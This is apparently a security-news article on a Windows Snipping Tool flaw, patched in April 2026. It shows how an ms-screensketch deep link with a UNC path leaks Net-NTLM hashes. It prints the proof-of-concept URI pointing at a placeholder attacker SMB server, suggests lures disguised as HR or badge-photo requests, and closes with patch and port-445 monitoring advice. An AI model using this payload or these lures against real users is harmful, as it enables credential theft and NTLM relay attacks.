How the Windows Snipping Tool Leaks NTLM Hashes – PoC Code Revealed

Vulnerability Exploitation Principle

Because the Snipping Tool registers a deep‑link URI (ms‑screensketch) without proper input validation, an attacker can supply a UNC path that points to a remote SMB server. When the link is opened, Windows establishes an authenticated SMB connection and automatically sends the user’s Net‑NTLM hash to the attacker’s server.

Windows Snipping Tool PoC Details

The PoC requires only a malicious URL or an HTML page that triggers the deep link. The following URI demonstrates the attack:

ms-screensketch:edit?&filePath=\\<attacker-smb-server>\file.png&isTemporary=false&saved=true&source=Toast

When a victim opens this link, the Snipping Tool launches, silently attempts to load the remote image via SMB, and Windows sends the Net‑NTLM authentication response to the attacker. The captured hash can be cracked offline or used for NTLM relay attacks against internal resources.

Because the tool opens as expected, the attack can be disguised as a legitimate request to edit a corporate wallpaper, employee badge photo, or HR document. An attacker may register a domain such as snip.example.com to serve benign‑looking image URLs that embed the malicious deep‑link payload.

Patch Release and Timeline

Microsoft fixed the issue in the Patch Tuesday update on 14 April 2026. The disclosure timeline is:

23 March 2026 – vulnerability reported to Microsoft.

14 April 2026 – security patch released.

14 April 2026 – coordinated public advisory and PoC publication.

Users of affected Windows versions should apply the April 14 2026 update immediately. Security teams should also monitor for unusual outbound SMB connections (port 445) to external or unknown hosts, which may indicate active exploitation. Blocking outbound SMB traffic at the network perimeter remains an effective mitigation.

PoC Exploit Released for Windows Snipping Tool NTLM Hash Leak Vulnerability